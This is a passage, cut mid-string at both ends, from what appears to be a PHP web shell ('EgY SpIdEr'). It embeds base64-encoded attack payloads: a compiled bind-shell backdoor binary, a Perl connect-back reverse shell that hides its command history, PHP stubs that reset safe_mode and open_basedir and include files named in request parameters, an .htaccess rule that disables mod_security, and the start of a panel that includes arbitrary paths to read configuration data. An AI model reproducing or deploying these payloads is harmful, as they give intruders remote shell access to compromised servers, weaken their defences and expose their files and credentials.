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ODYvZWxmL3N0YXJ0LlMAaW5pdC5jAGluaXRmaW5pLmMAL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2kzODYtbGliYy9jc3UvY3J0aS5TAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9MSVNUX18AX19EVE9SX0xJU1RfXwBfX0pDUl9MSVNUX18AY29tcGxldGVkLjQ0NjMAcC40NDYyAF9fZG9fZ2xvYmFsX2R0b3JzX2F1eABmcmFtZV9kdW1teQBfX0NUT1JfRU5EX18AX19EVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kb19nbG9iYWxfY3RvcnNfYXV4AC9idWlsZC9idWlsZGQvZ2xpYmMtMi4zLjYvYnVpbGQtdHJlZS9pMzg2LWxpYmMvY3N1L2NydG4uUwAxLmMAX0RZTkFNSUMAX19maW5pX2FycmF5X2VuZABfX2ZpbmlfYXJyYXlfc3RhcnQAX19pbml0X2FycmF5X2VuZABfR0xPQkFMX09GRlNFVF9UQUJMRV8AX19pbml0X2FycmF5X3N0YXJ0AGV4ZWNsQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZm9ya0BAR0xJQkNfMi4wAF9fZHNvX2hhbmRsZQBfX2xpYmNfY3N1X2ZpbmkAYWNjZXB0QEBHTElCQ18yLjAAX2luaXQAbGlzdGVuQEBHTElCQ18yLjAAc2V0c29ja29wdEBAR0xJQkNfMi4wAF9zdGFydABfX2xpYmNfY3N1X2luaXQAX19ic3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AGJpbmRAQEdMSUJDXzIuMABfZmluaQBleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfX2k2ODYuZ2V0X3BjX3RodW5rLmJ4AF9lbmQAc2VuZEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18A"; +$back_connects="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KaWYgKCEkQVJHVlswXSkgew0KICBwcmludGYgIlVzYWdlOiAkMCBbSG9zdF0gPFBvcnQ+XG4iOw0KICBleGl0KDEpOw0KfQ0KcHJpbnQgIlsqXSBEdW1waW5nIEFyZ3VtZW50c1xuIjsNCiRob3N0ID0gJEFSR1ZbMF07DQokcG9ydCA9IDgwOw0KaWYgKCRBUkdWWzFdKSB7DQogICRwb3J0ID0gJEFSR1ZbMV07DQp9DQpwcmludCAiWypdIENvbm5lY3RpbmcuLi5cbiI7DQokcHJvdG8gPSBnZXRwcm90b2J5bmFtZSgndGNwJykgfHwgZGllKCJVbmtub3duIFByb3RvY29sXG4iKTsNCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSAoIlNvY2tldCBFcnJvclxuIik7DQpteSAkdGFyZ2V0ID0gaW5ldF9hdG9uKCRob3N0KTsNCmlmICghY29ubmVjdChTRVJWRVIsIHBhY2sgIlNuQTR4OCIsIDIsICRwb3J0LCAkdGFyZ2V0KSkgew0KICBkaWUoIlVuYWJsZSB0byBDb25uZWN0XG4iKTsNCn0NCnByaW50ICJbKl0gU3Bhd25pbmcgU2hlbGxcbiI7DQppZiAoIWZvcmsoICkpIHsNCiAgb3BlbihTVERJTiwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERPVVQsIj4mU0VSVkVSIik7DQogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOw0KICBwcmludCAiLS09PSBDb25uZWN0QmFjayBCYWNrZG9vciB2cyAxLjAgYnkgU25JcEVyX1NBIHNuaXBlci1zYS5jb20gPT0tLSAgXG5cbiI7IA0Kc3lzdGVtKCJ1bnNldCBISVNURklMRTsgdW5zZXQgU0FWRUhJU1QgO2VjaG8gLS09PVN5c3RlbWluZm89PS0tIDsgdW5hbWUgLWE7ZWNobzsNCmVjaG8gLS09PVVzZXJpbmZvPT0tLSA7IGlkO2VjaG87ZWNobyAtLT09RGlyZWN0b3J5PT0tLSA7IHB3ZDtlY2hvOyBlY2hvIC0tPT1TaGVsbD09LS0gIik7IA0KICBleGVjIHsnL2Jpbi9zaCd9ICctYmFzaCcgLiAiXDAiIHggNDsNCiAgZXhpdCgwKTsNCn0="; +$egy_ini="PD8NCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZmlsZSJdKTsNCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmluaV9yZXN0b3JlKCJvcGVuX2Jhc2VkaXIiKTsNCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZWd5Il0pOw0KPz4="; +$htacces="PElmTW9kdWxlIG1vZF9zZWN1cml0eS5jPg0KICAgIFNlY0ZpbHRlckVuZ2luZSBPZmYNCiAgICBTZWNGaWx0ZXJTY2FuUE9TVCBPZmYNCjwvSWZNb2R1bGU+"; +$egy_res="PD8NCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZmlsZSJdKTsNCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmluaV9yZXN0b3JlKCJvcGVuX2Jhc2VkaXIiKTsNCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZWd5Il0pOw0KPz4="; +$egy_vb="DQo8aHRtbD48aGVhZD48dGl0bGU+RWdZIFNwSWRFciA8L3RpdGxlPg0KPFNUWUxFPg0KDQpCT0RZDQogew0KICAgICAgICBTQ1JPTExCQVItRkFDRS1DT0xPUjogIzAwMDAwMDsgU0NST0xMQkFSLUhJR0hMSUdIVC1DT0xPUjogIzAwMDAwMDsgU0NST0xMQkFSLVNIQURPVy1DT0xPUjogIzAwMDAwMDsgQ09MT1I6ICM2NjY2NjY7IFNDUk9MTEJBUi0zRExJR0hULUNPTE9SOiAjNzI2NDU2OyBTQ1JPTExCQVItQVJST1ctQ09MT1I6ICM3MjY0NTY7IFNDUk9MTEJBUi1UUkFDSy1DT0xPUjogIzI5MjkyOTsgRk9OVC1GQU1JTFk6IFZlcmRhbmE7IFNDUk9MTEJBUi1EQVJLU0hBRE9XLUNPTE9SOiAjNzI2NDU2DQp9DQoNCnRyIHsNCkJPUkRFUi1SSUdIVDogICNkYWRhZGEgOw0KQk9SREVSLVRPUDogICAgI2RhZGFkYSA7DQpCT1JERVItTEVGVDogICAjZGFkYWRhIDsNCkJPUkRFUi1CT1RUT006ICNkYWRhZGEgOw0KY29sb3I6ICNmZmZmZmY7DQp9DQp0ZCB7DQpCT1JERVItUklHSFQ6ICAjZGFkYWRhIDsNCkJPUkRFUi1UT1A6ICAgICNkYWRhZGEgOw0KQk9SREVSLUxFRlQ6ICAgI2RhZGFkYSA7DQpCT1JERVItQk9UVE9NOiAjZGFkYWRhIDsNCmNvbG9yOiAjZGFkYWRhOw0KfQ0KLnRhYmxlMSB7DQpCT1JERVI6IDE7DQpCQUNLR1JPVU5ELUNPTE9SOiAjMDAwMDAwOw0KY29sb3I6ICMzMzMzMzM7DQp9DQoudGQxIHsNCkJPUkRFUjogMTsNCmZvbnQ6IDdwdCB0YWhvbWE7DQpjb2xvcjogI2ZmZmZmZjsNCn0NCi50cjEgew0KQk9SREVSOiAxOw0KY29sb3I6ICNkYWRhZGE7DQp9DQp0YWJsZSB7DQpCT1JERVI6ICAjZWVlZWVlICBvdXRzZXQ7DQpCQUNLR1JPVU5ELUNPTE9SOiAjMDAwMDAwOw0KY29sb3I6ICNkYWRhZGE7DQp9DQppbnB1dCB7DQpCT1JERVItUklHSFQ6ICAjMDBGRjAwIDEgc29saWQ7DQpCT1JERVItVE9QOiAgICAjMDBGRjAwIDEgc29saWQ7DQpCT1JERVItTEVGVDogICMwMEZGMDAgMSBzb2xpZDsNCkJPUkRFUi1CT1RUT006ICMwMEZGMDAgMSBzb2xpZDsNCkJBQ0tHUk9VTkQtQ09MT1I6ICMzMzMzMzM7DQpmb250OiA5cHQgdGFob21hOw0KY29sb3I6ICNmZmZmZmY7DQp9DQpzZWxlY3Qgew0KQk9SREVSLVJJR0hUOiAgI2ZmZmZmZiAxIHNvbGlkOw0KQk9SREVSLVRPUDogICAgIzk5OTk5OSAxIHNvbGlkOw0KQk9SREVSLUxFRlQ6ICAgIzk5OTk5OSAxIHNvbGlkOw0KQk9SREVSLUJPVFRPTTogI2ZmZmZmZiAxIHNvbGlkOw0KQkFDS0dST1VORC1DT0xPUjogIzAwMDAwMDsNCmZvbnQ6IDlwdCB0YWhvbWE7DQpjb2xvcjogI2RhZGFkYTs7DQp9DQpzdWJtaXQgew0KQk9SREVSOiAgYnV0dG9uaGlnaGxpZ2h0IDEgb3V0c2V0Ow0KQkFDS0dST1VORC1DT0xPUjogIzI3MjcyNzsNCndpZHRoOiA0MCU7DQpjb2xvcjogI2RhZGFkYTsNCn0NCnRleHRhcmVhIHsNCkJPUkRFUi1SSUdIVDogICNmZmZmZmYgMSBzb2xpZDsNCkJPUkRFUi1UT1A6ICAgICM5OTk5OTkgMSBzb2xpZDsNCkJPUkRFUi1MRUZUOiAgICM5OTk5OTkgMSBzb2xpZDsNCkJPUkRFUi1CT1RUT006ICNmZmZmZmYgMSBzb2xpZDsNCkJBQ0tHUk9VTkQtQ09MT1I6ICMzMzMzMzM7DQpmb250OiBGaXhlZHN5cyBib2xkOw0KY29sb3I6ICNmZmZmZmY7DQp9DQpCT0RZIHsNCm1hcmdpbjogMTsNCmNvbG9yOiAjZGFkYWRhOw0KYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsNCn0NCkE6bGluayB7Q09MT1I6cmVkOyBURVhULURFQ09SQVRJT046IG5vbmV9DQpBOnZpc2l0ZWQgeyBDT0xPUjpyZWQ7IFRFWFQtREVDT1JBVElPTjogbm9uZX0NCkE6YWN0aXZlIHtDT0xPUjpyZWQ7IFRFWFQtREVDT1JBVElPTjogbm9uZX0NCkE6aG92ZXIge2NvbG9yOmJsdWU7VEVYVC1ERUNPUkFUSU9OOiBub25lfQ0KDQo8L1NUWUxFPg0KPC9oZWFkPg0KIDxib2R5IGJnY29sb3I9IiMwMDAwMDAiIHRleHQ9ImxpbWUiIGxpbms9ImxpbWUiIHZsaW5rPSJsaW1lIj4NCiA8Y2VudGVyPg0KPD8NCiRhY3QgPSAkX0dFVFsnYWN0J107DQppZigkYWN0PT0ncmVjb25maWcnICYmIGlzc2V0KCRfUE9TVFsncGF0aCddKSkNCnsNCiRwYXRoID0gJF9QT1NUWydwYXRoJ107DQppbmNsdWRlICRwYXRoOw0KPz4NCjx0YWJsZSBib3JkZXI9IjEiIGJnY29sb3I9IiMwMDAwMDAiIGJvcmRlcmNvbG9yPSJsaW1lIg0KYm9yZGVyY29sb3JkYXJrPSJsaW1lIiBib3JkZXJjb2xvcmxpZ2h0PSJsaW1lIj48dGg+Ojo6OlJlYWQgQ29uZmlnIERhdGE6Ojo6PC90aD48dGg+PD8gZWNobyAnPGZvbnQgY29sb3I9eWVsbG93PicgLiAkcGF0aCAuICc8L2ZvbnQ+JzsgPz48L3RoPg0KPHRyPg0KPH